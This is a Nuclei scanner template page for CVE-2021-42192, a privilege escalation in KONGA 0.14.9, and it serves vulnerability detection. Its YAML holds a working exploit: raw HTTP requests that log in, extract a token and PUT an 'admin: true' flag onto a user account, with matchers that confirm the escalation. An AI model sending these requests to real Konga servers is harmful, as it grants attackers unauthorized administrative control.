Skip to content
Nuclei Templates

KONGA 0.14.9 - Privilege Escalation

ID: CVE-2021-42192

Severity: high

Author: rschio

Tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project

Description

Section titled “Description”

KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2021-42192


info:
  name: KONGA 0.14.9 - Privilege Escalation
  author: rschio
  severity: high
  description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor.
  reference:
    - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
    - https://www.exploit-db.com/exploits/50521
    - hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
    - https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing
    - https://github.com/pantsel/konga/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-42192
    cwe-id: CWE-863
    epss-score: 0.05551
    epss-percentile: 0.93226
    cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: konga_project
    product: konga
  tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project


http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"password": "{{password}}", "identifier": "{{username}}"}
      - |
        POST /api/user/{{id}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/json;charset=utf-8


        {"token": "{{token}}"}
      - |
        PUT /api/user/{{id}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/json;charset=utf-8


        {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "\"admin\":false")
          - contains(body_3, "\"admin\":true")
        condition: and


      - type: word
        part: header
        words:
          - application/json


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: id
        group: 1
        regex:
          - '"id":([0-9]+)'
        internal: true
        part: body


      - type: regex
        name: token
        group: 1
        regex:
          - '"token":"(.*)"'
        internal: true
        part: body
# digest: 490a0046304402201f724a0041bfac3ca52e85b5cd220018c4477c86617e8e01945a9e4037db4005022028e8f1d95af63e18e80d41b772902aead3271c2d2f029d7f7f501fe951a87f69:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42192.yaml"

View on Github